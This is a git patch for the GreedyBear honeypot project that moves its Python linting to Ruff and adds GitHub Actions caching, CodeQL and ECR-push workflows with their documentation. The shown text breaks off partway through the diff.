a492676 Deprecation of license check `table-headers` (#212)
0a6db48 Updated python linters also in '_python.yml' workflow

git-subtree-dir: .github
git-subtree-split: 5a78179ab0cbea826c416f8975251b519c2541fc

* Simplify pre-commit to use only Ruff

- Removed black, isort, flake8, pylint, bandit, autoflake from pre-commit
- Ruff provides equivalent functionality for all of these
- Faster pre-commit execution
- Avoids conflicting linter rules

* Update documentation to reflect Ruff migration

- Replaced black and isort badges with Ruff badge in README
- Updated PR template checklist to mention Ruff instead of Black/Flake/Isort

* Run Ruff to fix linting and formatting issues

- Fixed 37 import sorting and unused import issues
- Reformatted 5 files with ruff format
- Fixed pre-commit ruff args (removed invalid 'check' argument)
- 14 wildcard import warnings remain (F403) which require manual review

* Add .ruff_cache to .gitignore

- Exclude Ruff's cache directory from version control

* Silence F403 wildcard import warnings

As per maintainer feedback, silenced F403 warnings for wildcard imports in __init__.py files since they are acceptable for this project.

* Add pyproject.toml and fix migration file imports

- Created pyproject.toml to extend ruff config for easier CLI usage
- Fixed import sorting in 5 Django migration files
- Now 'ruff check .' works without explicit --config flag

* Apply ruff formatting to remaining files

- Reformatted 30 Python files with ruff format
- This is the result of running 'ruff format .' after creating pyproject.toml
- No logic changes, only formatting (line breaks, spacing)

* Add empty packages.txt for certego/.github v2.0.0 compatibility

The new certego/.github v2.0.0 APT cache workflow requires a packages
file, even if empty. This is a workaround for the workflow's strict
validation that was introduced in v2.0.0.

* Add packages_path to workflow configuration

Pass packages.txt to the workflow to fix APT cache restoration step

* Make packages.txt truly empty

Remove comments that were being interpreted as package names by apt-get

* Specify RabbitMQ version for CI

Use rabbitmq:4-management-alpine to fix Docker image pull error.
The default 'latest' is not a valid tag for management-alpine images.

* Fix RabbitMQ version tag duplication

Use version '4' instead of '4-management-alpine' since the workflow
automatically appends '-management-alpine' suffix

* Expand Ruff rule coverage with comprehensive linting modules

Added comprehensive Ruff rule modules as requested:
- E/W: Full pycodestyle error and warning coverage
- N: pep8-naming for naming conventions
- UP: pyupgrade for modern Python syntax
- B: flake8-bugbear for common Python bugs
- C4: flake8-comprehensions for list/dict improvements
- DJ: flake8-django for Django-specific linting

All rules are documented with inline comments and links to official docs.

Fixed 43 auto-fixable violations (imports, annotations, etc).
Added comprehensive ignore list for intentional code patterns:
- Test helpers (mutable defaults, classmethods)
- ML conventions (X, X_train naming)
- Django patterns (null=True on CharField, models without __str__)
- Legacy naming (viewType, iocType, migration functions)

All checks passing ✅

* Fix easy E/N/UP/C violations as requested

Applied Ruff auto-fixes for straightforward style improvements:
- N804: Renamed 'self' → 'cls' in test classmethods (6 occurrences)
- UP008: Simplified super() calls (3 occurrences)
- UP031/UP032: Modernized string formatting (2 occurrences)
- C401: Fixed set comprehensions (7 occurrences)

Total: 18 violations fixed across 7 files.

Invasive changes (N801/N802 model/function renames, N803/N806 ML naming)
deferred to follow-up issue for dedicated testing and review.
---
 .github/.pre-commit-config.yaml               |  23 +-
 .github/CHANGELOG.md                          |  40 +-
 .github/actions/apt_requirements/action.yml   |  25 -
 .../restore_apt_cache/README.md               |  29 +
 .../restore_apt_cache/action.yml              |  64 +++
 .../apt_requirements/save_apt_cache/README.md |  22 +
 .../save_apt_cache/action.yml                 |  24 +
 .github/actions/codeql/action.yml             |   5 +-
 .../actions/misc/compute_files_hash/README.md |  18 +
 .../misc/compute_files_hash/action.yml        |  40 ++
 .github/actions/push_on_ecr/action.yml        |  56 ++
 .github/actions/python_linter/action.yml      |  37 +-
 .../create_dev_requirements_file/README.md    |  13 +
 .../create_dev_requirements_file/action.yml   |  28 +
 .../create_docs_requirements_file/README.md   |  12 +
 .../create_docs_requirements_file/action.yml  |  37 ++
 .../create_linter_requirements_file/README.md |  32 ++
 .../action.yml                                | 103 ++++
 .../create_virtualenv/README.md               |  20 +
 .../create_virtualenv/action.yml              |  28 +
 .../restore_pip_cache/README.md               |  41 ++
 .../restore_pip_cache/action.yml              |  53 ++
 .../restore_virtualenv/README.md              |  30 +
 .../restore_virtualenv/action.yml             |  43 ++
 .../save_pip_cache/README.md                  |  22 +
 .../save_pip_cache/action.yml                 |  36 ++
 .../save_virtualenv/README.md                 |  23 +
 .../save_virtualenv/action.yml                |  29 +
 .github/actions/services/action.yml           |   1 +
 .../configurations/python_linters/.ruff.toml  |  90 +++
 .../python_linters/requirements-linters.txt   |  13 +-
 .github/pull_request_template.md              |   2 +-
 .github/workflows/README.md                   | 217 ++++++++
 .github/workflows/_detect_changes.yml         |  45 +-
 .github/workflows/_node.yml                   |  15 +-
 .github/workflows/_python.yml                 | 521 ++++++++++--------
 .github/workflows/_release_and_tag.yml        |  76 ++-
 .github/workflows/create_apt_cache.yaml       |  38 ++
 .github/workflows/create_python_cache.yaml    |  55 ++
 .github/workflows/pull_request_automation.yml |  13 +-
 .github/workflows/release.yml                 |   6 +
 .gitignore                                    |   3 +
 README.md                                     |   3 +-
 api/serializers.py                            |   3 +-
 api/urls.py                                   |   5 +-
 api/views/command_sequence.py                 |  17 +-
 api/views/cowrie_session.py                   |  21 +-
 api/views/enrichment.py                       |  13 +-
 api/views/feeds.py                            |  18 +-
 api/views/general_honeypot.py                 |   5 +-
 api/views/statistics.py                       |   3 +-
 api/views/utils.py                            |  13 +-
 authentication/admin.py                       |   5 +-
 authentication/migrations/0001_initial.py     |  55 +-
 authentication/serializers.py                 |  11 +-
 authentication/views.py                       |  57 +-
 greedybear/admin.py                           |  13 +-
 greedybear/celery.py                          |   4 +-
 greedybear/cronjobs/cleanup.py                |   6 +-
 greedybear/cronjobs/commands/cluster.py       |   2 +-
 .../cronjobs/extraction/ioc_processor.py      |   3 +-
 greedybear/cronjobs/extraction/pipeline.py    |  12 +-
 .../cronjobs/extraction/strategies/cowrie.py  |  21 +-
 .../cronjobs/extraction/strategies/factory.py |   7 +-
 .../cronjobs/extraction/strategies/log4pot.py |  11 +-
 greedybear/cronjobs/extraction/utils.py       |   8 +-
 greedybear/cronjobs/firehol.py                |   3 +-
 greedybear/cronjobs/mass_scanners.py          |   6 +-
 .../cronjobs/repositories/cowrie_session.py   |   3 +-
 greedybear/cronjobs/repositories/elastic.py   |   7 +-
 greedybear/cronjobs/repositories/ioc.py       |   7 +-
 greedybear/cronjobs/scoring/ml_model.py       |   3 +-
 greedybear/cronjobs/scoring/random_forest.py  |   9 +-
 greedybear/cronjobs/scoring/scoring_jobs.py   |  21 +-
 greedybear/cronjobs/scoring/utils.py          |   5 +-
 greedybear/cronjobs/whatsmyip.py              |   6 +-
 greedybear/migrations/0001_initial.py         |   1 -
 greedybear/migrations/0002_ioc_cowrie.py      |   1 -
 greedybear/migrations/0003_statistics.py      |   1 -
 greedybear/migrations/0004_alter_id_field.py  |   1 -
 greedybear/migrations/0005_clients.py         |   1 -
 greedybear/migrations/0006_ioc_general_hps.py |   1 -
 greedybear/migrations/0007_generalhoneypot.py |   1 -
 .../migrations/0008_auto_20230120_1548.py     |   1 -
 .../0009_alter_ioc_general_field.py           |   5 +-
 .../migrations/0010_alter_ioc_related_ioc.py  |   9 +-
 ..._seen_ioc_attack_count_ioc_asn_and_more.py |  32 +-
 .../migrations/0014_auto_20250210_1258.py     |   2 +-
 ...esession_greedybear__source__a3720f_idx.py |   5 +-
 ..._commandsequence_cowriesession_commands.py |  26 +-
 ...ter_commandsequence_first_seen_and_more.py |   6 +-
 greedybear/migrations/0020_massscanners.py    |  12 +-
 ...scanners_greedybear__ip_addr_2aa484_idx.py |   5 +-
 greedybear/migrations/0022_whatsmyip.py       |  18 +-
 ...tegories_alter_statistics_view_and_more.py |  25 +-
 .../migrations/0025_merge_20251223_2100.py    |   1 -
 greedybear/models.py                          |  14 +-
 greedybear/tasks.py                           |   2 +-
 manage.py                                     |   1 +
 packages.txt                                  |   0
 pyproject.toml                                |   2 +
 tests/__init__.py                             |  13 +-
 tests/authentication/test_auth.py             |   8 +-
 tests/greedybear/cronjobs/test_firehol.py     |   2 +-
 tests/test_clustering.py                      |  23 +-
 tests/test_cowrie_extraction.py               |   7 +-
 tests/test_extraction_strategies.py           |   6 +-
 tests/test_extraction_utils.py                |   8 +-
 tests/test_ioc_processor.py                   |   5 +-
 tests/test_models.py                          |   6 +-
 tests/test_repositories.py                    |  28 +-
 tests/test_rf_config.py                       |  15 +-
 tests/test_rf_models.py                       |   9 +-
 tests/test_scoring_utils.py                   |   9 +-
 tests/test_serializers.py                     |  25 +-
 tests/test_views.py                           |  23 +-
 116 files changed, 2241 insertions(+), 533 deletions(-)
 delete mode 100644 .github/actions/apt_requirements/action.yml
 create mode 100644 .github/actions/apt_requirements/restore_apt_cache/README.md
 create mode 100644 .github/actions/apt_requirements/restore_apt_cache/action.yml
 create mode 100644 .github/actions/apt_requirements/save_apt_cache/README.md
 create mode 100644 .github/actions/apt_requirements/save_apt_cache/action.yml
 create mode 100644 .github/actions/misc/compute_files_hash/README.md
 create mode 100644 .github/actions/misc/compute_files_hash/action.yml
 create mode 100644 .github/actions/push_on_ecr/action.yml
 create mode 100644 .github/actions/python_requirements/create_dev_requirements_file/README.md
 create mode 100644 .github/actions/python_requirements/create_dev_requirements_file/action.yml
 create mode 100644 .github/actions/python_requirements/create_docs_requirements_file/README.md
 create mode 100644 .github/actions/python_requirements/create_docs_requirements_file/action.yml
 create mode 100644 .github/actions/python_requirements/create_linter_requirements_file/README.md
 create mode 100644 .github/actions/python_requirements/create_linter_requirements_file/action.yml
 create mode 100644 .github/actions/python_requirements/create_virtualenv/README.md
 create mode 100644 .github/actions/python_requirements/create_virtualenv/action.yml
 create mode 100644 .github/actions/python_requirements/restore_pip_cache/README.md
 create mode 100644 .github/actions/python_requirements/restore_pip_cache/action.yml
 create mode 100644 .github/actions/python_requirements/restore_virtualenv/README.md
 create mode 100644 .github/actions/python_requirements/restore_virtualenv/action.yml
 create mode 100644 .github/actions/python_requirements/save_pip_cache/README.md
 create mode 100644 .github/actions/python_requirements/save_pip_cache/action.yml
 create mode 100644 .github/actions/python_requirements/save_virtualenv/README.md
 create mode 100644 .github/actions/python_requirements/save_virtualenv/action.yml
 create mode 100644 .github/configurations/python_linters/.ruff.toml
 create mode 100644 .github/workflows/README.md
 create mode 100644 .github/workflows/create_apt_cache.yaml
 create mode 100644 .github/workflows/create_python_cache.yaml
 create mode 100644 packages.txt
 create mode 100644 pyproject.toml

diff --git a/.github/.pre-commit-config.yaml b/.github/.pre-commit-config.yaml
index 42878d62..8da56aab 100644
--- a/.github/.pre-commit-config.yaml
+++ b/.github/.pre-commit-config.yaml
@@ -1,18 +1,9 @@
 repos:
--   repo: https://github.com/pycqa/flake8
-    rev: 7.1.1
+-   repo: https://github.com/astral-sh/ruff-pre-commit
+    rev: v0.12.7
     hooks:
-    - id: flake8
-      args: ["--config", ".github/configurations/python_linters/.flake8"]
-
--   repo: https://github.com/pycqa/isort
-    rev: 5.13.2
-    hooks:
-      - id: isort
-        args: ["--settings-path", ".github/configurations/python_linters/.isort.cfg", "--filter-files", "--skip", "venv"]
-
--   repo: https://github.com/psf/black
-    rev: 24.8.0
-    hooks:
-      - id: black
-        args: ["--config", ".github/configurations/python_linters/.black"]
+      - id: ruff
+        name: ruff-lint
+        args: ["--fix", "--config", "./.github/configurations/python_linters/.ruff.toml"]
+      - id: ruff-format
+        args: ["--config", "./.github/configurations/python_linters/.ruff.toml"]
diff --git a/.github/CHANGELOG.md b/.github/CHANGELOG.md
index 473e1c33..9bd60775 100644
--- a/.github/CHANGELOG.md
+++ b/.github/CHANGELOG.md
@@ -1,5 +1,40 @@
 # Changelog
-From the v1.3.0 afterwards please check the Release Pages on Github for information regarding the changelog
+From the v1.3.0 onwards please check the Release Pages on Github for information regarding the changelog
+
+## Certego .github Package Changelog
+
+## 2.0.x
+### 2.0.0
+#### Features
+* Added "release.yml" action to to push containers to AWS ECR
+* Added *create_apt_cache.yaml* workflow to cache APT requirements each time a commit is pushed on selected branch and **when the requirements file has changed**.
+* Added documentation.
+* Added "Ruff" to the list of available Python linters.
+#### Bugfix
+* Updated python linters also in '_python.yml' workflow (missing from previous release)
+* Explicitly disabled `xpack.security` in Elasticsearch container, since it is enabled by default in newer versions of Elasticsearch
+* Added missing inputs for "create_linter_requirements_file" action.
+#### Changes
+* Deprecation of license check table-headers
+* Updated Python linters:
+  * bandit 1.7.9 -> 1.8.3
+  * black 24.8.0 -> 25.1.0
+  * flake8 7.1.1 -> 7.1.2
+  * isort 5.13.2 -> 6.0.1
+  * pylint-django 2.5.5 -> 2.6.1
+  * pylint 3.2.6 -> 3.3.5
+* Removed `awalsh128/cache-apt-pkgs-action@latest` action and rewrote APT caching using GitHub's `actions/cache/restore@v4` and `actions/cache/save@v4`.
+* Added both frontend and backend exclusions on _detect_changes.yaml (paths that won't be considered by git diff)
+* Updated CodeQL action v2 -> v3 (v2 has been [deprecated](https://github.blog/changelog/2024-01-12-code-scanning-deprecation-of-codeql-action-v2/) on december '24)
+* Removed `setup-python-dependencies` from `codeql/action.yml` since it has no effect anymore. See [this](https://github.blog/changelog/2024-01-23-codeql-2-16-python-dependency-installation-disabled-new-queries-and-bug-fixes/) for more information.
+* Linters versions in step `Create requirements-linters.txt` of `_python.yml` action are now computed according to `configurations/python_linters/requirements-linters.txt`. As of now, linter updates are only required in `configurations/python_linters/requirements-linters.txt`.
+* Reworked Python requirements caching.
+* Updated some Github actions:
+  * setup-python v4 -> v5
+  * action-gh-release v1 -> v2
+* Added "Install system dependencies required by Python packages" step to "Create Python cache" workflow.
+
+## GreedyBear Changelog
 
 ## [v1.2.1](https://github.com/honeynet/GreedyBear/releases/tag/v1.2.1)
 * Fixes and adjusts in the "Feeds Page"
@@ -42,4 +77,5 @@ Added support for all the other available honeypots! (#86)
 ## [v1.0.0](https://github.com/honeynet/GreedyBear/releases/tag/v1.0.0)
 
 ** FIRST RELEASE! **
-A new GUI is available to explore the data with an awesome dashboard!
\ No newline at end of file
+A new GUI is available to explore the data with an awesome dashboard!
+
diff --git a/.github/actions/apt_requirements/action.yml b/.github/actions/apt_requirements/action.yml
deleted file mode 100644
index 872cbe58..00000000
--- a/.github/actions/apt_requirements/action.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: Composite action  install apt requirements
-description: Composite action install apt requirements
-inputs:
-  working_directory:
-    description: Working directory 
-    required: true
-  requirements_file:
-    description: Requirements file
-    required: true
-
-runs:
-  using: "composite"
-  steps:
-    - name: Export apt requirements
-      id: export-apt-requirements
-      run: |
-        PKG=$(cat ${{ inputs.requirements_file }})
-        echo apt_packages=$PKG | awk '{print}' ORS=' ' >> $GITHUB_OUTPUT
-      shell: bash
-
-    - name: Cache apt packages
-      id: cache-apt-packages
-      uses: awalsh128/cache-apt-pkgs-action@latest
-      with:
-        packages: ${{ steps.export-apt-requirements.outputs.apt_packages }}
\ No newline at end of file
diff --git a/.github/actions/apt_requirements/restore_apt_cache/README.md b/.github/actions/apt_requirements/restore_apt_cache/README.md
new file mode 100644
index 00000000..046b58e4
--- /dev/null
+++ b/.github/actions/apt_requirements/restore_apt_cache/README.md
@@ -0,0 +1,29 @@
+# Composite action restore APT cache
+
+This action restores an APT cache from GitHub's cache.
+
+Combined with [**save_apt_cache**](../save_apt_cache/README.md), it helps save time by avoiding the download of APT requirements.
+
+The action is composed of five steps:
+
+1. **Compute APT requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute a single SHA256 hash of the APT requirements file described by the *apt_rquirements_file_path* input variable. The computed SHA256 hash will be part of the cache key.
+2. **Backup `/var/cache/apt/archives permissions`** - This step backs up the permissions associated to the `/var/cache/apt/archives` directory. So, after restoring the APT cache they can be restored to the original ones.
+3. **Add write permissions for all to `/var/cache/apt/archives`** - This step sets the write permission to the `/var/cache/apt/archives`. This is crucial because the [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) GitHub's action needs to be able to write to it. Without setting the correct write permission, a permission error is raised.
+4. **Restore APT cache** - This step restores the APT cache. It uses the GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action with the following parameters:
+   * **path** - A list of files, directories, or paths to restore - set to `/var/cache/apt/archives/*.deb`.
+   * **key** - An explicit key for a cache entry - set to the combination of three strings:
+      * *git_reference*, provided as an input to the action.
+      * A static part, `-apt-`
+      * The previously computed SHA256 hash of the APT requirements file.
+5. **Restore original permissions to `/var/cache/apt/archives` and delete backup** - This step restore the original permissions to the `/var/cache/apt/archives` directory. Finally, the backup file is deleted.
+
+## Documentation
+
+### Inputs
+
+* **apt_requirements_file_path** - Required - Path to the APT requirements file. It will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which is true when APT cache is found in the GitHub's cache, false otherwise.
diff --git a/.github/actions/apt_requirements/restore_apt_cache/action.yml b/.github/actions/apt_requirements/restore_apt_cache/action.yml
new file mode 100644
index 00000000..282935bd
--- /dev/null
+++ b/.github/actions/apt_requirements/restore_apt_cache/action.yml
@@ -0,0 +1,64 @@
+name: Composite action restore APT cache
+description: Composite action to restore APT cache
+inputs:
+  apt_requirements_file_path:
+    description: Path to the APT requirements file
+    required: true
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+outputs:
+  cache-hit:
+    description: Whether the APT cache was found in the GitHub's cache or not.
+    value: ${{ steps.restore_apt_cache.outputs.cache-hit }}
+
+
+runs:
+  using: "composite"
+  steps:
+    - name: Compute APT requirements file SHA256 hash
+      id: compute_apt_requirements_file_sha256_hash
+      uses: ./.github/actions/misc/compute_files_hash
+      with:
+        file_paths: ${{ inputs.apt_requirements_file_path }}
+
+    - name: Backup /var/cache/apt/archives permissions
+      id: backup_apt_cache_dir_permissions
+      run: |
+        PERMISSIONS_FILE_PATH="/tmp/apt_cache_dir_permissions.facl"
+        echo "apt_cache_dir_permissions_file=$PERMISSIONS_FILE_PATH" > $GITHUB_OUTPUT
+        sudo getfacl -p /var/cache/apt/archives > $PERMISSIONS_FILE_PATH
+        ARCHIVES_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+        echo "::debug::Original permissions given to /var/cache/apt/archives: $ARCHIVES_PERMISSIONS"
+        echo "::debug::Created /var/cache/apt/archives permissions backup to $PERMISSIONS_FILE_PATH"
+      shell: bash
+    
+    # Vital to be able to restore cache
+    # If write permission is not set, a permissions error will be raised
+    - name: Add write permission for all to /var/cache/apt/archives
+      run: |
+        sudo chmod a+w /var/cache/apt/archives
+        ARCHIVES_NEW_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+        echo "::debug::New permissions given to /var/cache/apt/archives: $ARCHIVES_NEW_PERMISSIONS"
+      shell: bash
+    
+    - name: Restore APT cache
+      uses: actions/cache/restore@v4
+      id: restore_apt_cache
+      with:
+        path: /var/cache/apt/archives/*.deb
+        key: ${{ inputs.git_reference }}-apt-${{ steps.compute_apt_requirements_file_sha256_hash.outputs.computed_hash }}
+    
+    - name: Restore original permissions to /var/cache/apt/archives and delete backup
+      run: |
+        PERMISSIONS_FILE_PATH=${{ steps.backup_apt_cache_dir_permissions.outputs.apt_cache_dir_permissions_file }}
+        sudo setfacl --restore="$PERMISSIONS_FILE_PATH"
+        ARCHIVES_RESTORED_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+        echo "::debug::Restored original permissions to /var/cache/apt/archives: $ARCHIVES_RESTORED_PERMISSIONS"
+        if [[ -f "$PERMISSIONS_FILE_PATH" ]]; then
+          sudo rm "$PERMISSIONS_FILE_PATH"
+          echo "::debug::Correctly removed $PERMISSIONS_FILE_PATH permissions backup file"
+        fi
+      shell: bash
\ No newline at end of file
diff --git a/.github/actions/apt_requirements/save_apt_cache/README.md b/.github/actions/apt_requirements/save_apt_cache/README.md
new file mode 100644
index 00000000..4d8dca82
--- /dev/null
+++ b/.github/actions/apt_requirements/save_apt_cache/README.md
@@ -0,0 +1,22 @@
+# Composite action save APT cache
+
+This action saves the APT cache, almost always located at `/var/cache/apt/archives/*.deb` to the GitHub's cache.
+
+Combined with [**restore_apt_cache**](../restore_apt_cache/README.md) helps save time by avoiding the download of APT requirements.
+
+The action is composed of two steps:
+
+1. **Compute APT requirements file SHA256 hash** - This step uses the [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute the SHA256 hash of the APT requriments file that will be part of the cache key.
+2. **Save APT cache** - This step does the real caching on GitHub. The GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) is used with the following parameters:
+   1. **path** - A list of files, directories, or paths to cache - set to `/var/cache/apt/archives/*.deb` to save all `*.deb` files in APT cache.
+   2. **key** - An explicit key for a cache entry - set to the combination of three strings:
+      1. *git_reference*, provided as an input to the action.
+      2. A static part, `-apt-`
+      3. The previously computed SHA256 hash of the APT requirements file.
+
+## Documentation
+
+### Inputs
+
+* **apt_requirements_file_path** - Required - Path to the APT requirements file. It will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
diff --git a/.github/actions/apt_requirements/save_apt_cache/action.yml b/.github/actions/apt_requirements/save_apt_cache/action.yml
new file mode 100644
index 00000000..af41cfde
--- /dev/null
+++ b/.github/actions/apt_requirements/save_apt_cache/action.yml
@@ -0,0 +1,24 @@
+name: Composite action save APT cache
+description: Composite action to save APT cache
+inputs:
+  apt_requirements_file_path:
+    description: Path to the APT requirements file
+    required: true
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Compute APT requiremments file SHA256 hash
+      id: compute_apt_requirements_file_sha256_hash
+      uses: ./.github/actions/misc/compute_files_hash
+      with:
+        file_paths: ${{ inputs.apt_requirements_file_path }}
+    - name: Save APT cache
+      uses: actions/cache/save@v4
+      with:
+        path: /var/cache/apt/archives/*.deb
+        key: ${{ inputs.git_reference }}-apt-${{ steps.compute_apt_requirements_file_sha256_hash.outputs.computed_hash }}
\ No newline at end of file
diff --git a/.github/actions/codeql/action.yml b/.github/actions/codeql/action.yml
index b49e2b60..22c16e19 100644
--- a/.github/actions/codeql/action.yml
+++ b/.github/actions/codeql/action.yml
@@ -12,13 +12,12 @@ runs:
   using: "composite"
   steps:
     - name: Initialize CodeQL
-      uses: github/codeql-action/init@v2
+      uses: github/codeql-action/init@v3
       with:
         languages: ${{ inputs.language }}
-        setup-python-dependencies: false
         source-root: ${{ inputs.working_directory }}
 
     - name: Perform CodeQL Analysis
-      uses: github/codeql-action/analyze@v2
+      uses: github/codeql-action/analyze@v3
 
 
diff --git a/.github/actions/misc/compute_files_hash/README.md b/.github/actions/misc/compute_files_hash/README.md
new file mode 100644
index 00000000..f1c594f3
--- /dev/null
+++ b/.github/actions/misc/compute_files_hash/README.md
@@ -0,0 +1,18 @@
+# Composite action compute files hash
+
+This action computes a single SHA256 hash of one or more files.
+Given a **space separated list of file paths**, a new file is created by concatenating all those files together. Then the SHA256 hash of the newly created file is computed and returned as the output.
+
+Before being joined together, each file is tested to ensure that it **exists** and that it is **a regular file**.
+
+This action is useful when saving/restoring a cache in which a unique key is required. As a matter of fact, the hash is used as a part of the hash key.
+
+## Documentation
+
+### Inputs
+
+* `file_paths` - Mandatory - Space separated list of file paths for which a single SHA256 hash will be computed.
+
+### Outputs
+
+* `computed_hash` - A SHA256 hash of the file obtained by joining (concatenating) all input files together.
diff --git a/.github/actions/misc/compute_files_hash/action.yml b/.github/actions/misc/compute_files_hash/action.yml
new file mode 100644
index 00000000..fca2a53a
--- /dev/null
+++ b/.github/actions/misc/compute_files_hash/action.yml
@@ -0,0 +1,40 @@
+name: Composite action compute files hash
+description: Composite action to compute a single hash of one or more files
+inputs:
+  file_paths:
+    description: Space separeted list of files for which a single SHA256 hash will be computed.
+    required: true
+
+outputs:
+  computed_hash:
+    description: The hash of the concatenated files
+    value: ${{ steps.compute_files_sha256_hash.outputs.computed_hash }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Compute files SHA256 hash
+      id: compute_files_sha256_hash
+      run: |
+        if [[ -z '${{ inputs.file_paths }}' ]]; then
+          echo "::error::file_paths cannot be empty!"
+          exit 1
+        fi
+        JOINED_FILES="cat "
+        # Create a bash array of file paths
+        for file in ${{ inputs.file_paths }};
+        do
+          if [[ -f $file ]]; then
+            # Concat file path to cat command
+            JOINED_FILES+="$file "
+            echo "::debug::Current file is $file"
+            echo "::debug::JOINED_FILES variable state is $JOINED_FILES"
+          else
+            echo "::error::$file does not exist or it is not a regular file!"
+            exit 1
+          fi
+        done
+        COMPUTED_HASH=$($JOINED_FILES | sha256sum | cut -d ' ' -f 1)
+        echo "::debug::Hash is $COMPUTED_HASH"
+        echo "computed_hash=$COMPUTED_HASH" >> $GITHUB_OUTPUT
+      shell: bash
\ No newline at end of file
diff --git a/.github/actions/push_on_ecr/action.yml b/.github/actions/push_on_ecr/action.yml
new file mode 100644
index 00000000..f130e595
--- /dev/null
+++ b/.github/actions/push_on_ecr/action.yml
@@ -0,0 +1,56 @@
+name: Composite action push on ecr
+description: Composite action push on ecr
+inputs:
+  repository:
+    description: Repository name
+    required: true
+  dockerfile:
+    description: Path for dockerfile from working directory
+    required: true
+  working_directory:
+    description: Docker build context
+    required: true
+
+  aws_account_id:
+    description: Aws User code
+    required: true
+  aws_access_key:
+    description: Aws access key
+    required: true
+  aws_secret_access_key:
+    description: Aws secret access key
+    required: true
+  image_tag:
+    description: Directory that must be run against the linters
+    required: true
+
+  aws_region:
+    description: Aws region
+    required: true
+
+runs:
+  using: "composite"
+  steps:
+    - name: Configure AWS Credentials
+      uses: aws-actions/configure-aws-credentials@v4
+      with:
+        aws-region: ${{ inputs.aws_region}}
+        aws-access-key-id: ${{ inputs.aws_access_key }}
+        aws-secret-access-key: ${{ inputs.aws_secret_access_key }}
+
+    - name: Login to Amazon ECR Private
+      id: login-ecr
+      uses: aws-actions/amazon-ecr-login@v2
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v3
+
+    - name: Build and push
+      uses: docker/build-push-action@v5
+      with:
+        context: ${{ inputs.working_directory }}
+        push: true
+        cache-from: type=gha
+        cache-to: type=gha,mode=max
+        tags: ${{inputs.aws_account_id}}.dkr.ecr.${{inputs.aws_region}}.amazonaws.com/${{ inputs.repository }}:${{ inputs.image_tag }}
+        file: ${{ inputs.working_directory }}/${{ inputs.dockerfile }}
diff --git a/.github/actions/python_linter/action.yml b/.github/actions/python_linter/action.yml
index 8c285e00..1bd46376 100644
--- a/.github/actions/python_linter/action.yml
+++ b/.github/actions/python_linter/action.yml
@@ -5,6 +5,12 @@ inputs:
     description: Directory that must be run against the linters
     required: true
 
+  use_autoflake:
+    description: Use autoflake
+    required: true
+  use_bandit:
+    description: Use bandit linter
+    required: true
   use_black:
     description: Use black formatter
     required: true
@@ -17,11 +23,11 @@ inputs:
   use_pylint:
     description: Use pylint linter
     required: true
-  use_bandit:
-    description: Use bandit linter
+  use_ruff_formatter:
+    description: Use ruff formatter
     required: true
-  use_autoflake:
-    description: Use autoflake
+  use_ruff_linter:
+    description: Use ruff linter
     required: true
 
 runs:
@@ -66,11 +72,9 @@ runs:
         else
             echo "Skipping isort linter"
         fi
-
       working-directory: ${{ inputs.working_directory }}
       shell: bash
 
-
     - name: bandit
       run: |
         if [[ ${{inputs.use_bandit }} != 'false' ]]; then
@@ -78,7 +82,6 @@ runs:
         else
             echo "Skipping bandit linter"
         fi
-
       working-directory: ${{ inputs.working_directory }}
       shell: bash
 
@@ -90,4 +93,24 @@ runs:
             echo "Skipping autoflake"
         fi
       working-directory: ${{ inputs.working_directory }}
+      shell: bash
+
+    - name: ruff formatter
+      run: |
+        if [[ ${{ inputs.use_ruff_formatter }} != 'false' ]]; then
+          ruff format --config ${GITHUB_WORKSPACE}/.github/configurations/python_linters/.ruff.toml --diff .
+        else
+          echo "Skipping ruff formatter"
+        fi
+      working-directory: ${{ inputs.working_directory }}
+      shell: bash
+    
+    - name: ruff linter
+      run: |
+        if [[ ${{ inputs.use_ruff_linter }} != 'false' ]]; then
+          ruff check --config ${GITHUB_WORKSPACE}/.github/configurations/python_linters/.ruff.toml .
+        else
+          echo "Skipping ruff linter"
+        fi
+      working-directory: ${{ inputs.working_directory }}
       shell: bash
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_dev_requirements_file/README.md b/.github/actions/python_requirements/create_dev_requirements_file/README.md
new file mode 100644
index 00000000..ae32be02
--- /dev/null
+++ b/.github/actions/python_requirements/create_dev_requirements_file/README.md
@@ -0,0 +1,13 @@
+# Composite action create Python dev requirements file
+
+This action creates the `requirements-dev.txt` file which will contain all **development dependencies**.
+
+As of today, the only development dependency supported is `coverage`.
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-dev.txt` file. It defaults to the current directory (i.e. `.`).
+* **project_dev_requirements_file** - Optional - The path of a project `requirements-dev.txt`. This was designed in case development requirements other than coverage are required. If specified, the dependencies in the project `requirements-dev.txt` will be appended in the newly created `requirements-dev.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-dev.txt`**.
+* **use_coverage** - Optional - Whether to use coverage or not. It defaults to false.
diff --git a/.github/actions/python_requirements/create_dev_requirements_file/action.yml b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
new file mode 100644
index 00000000..eb86a046
--- /dev/null
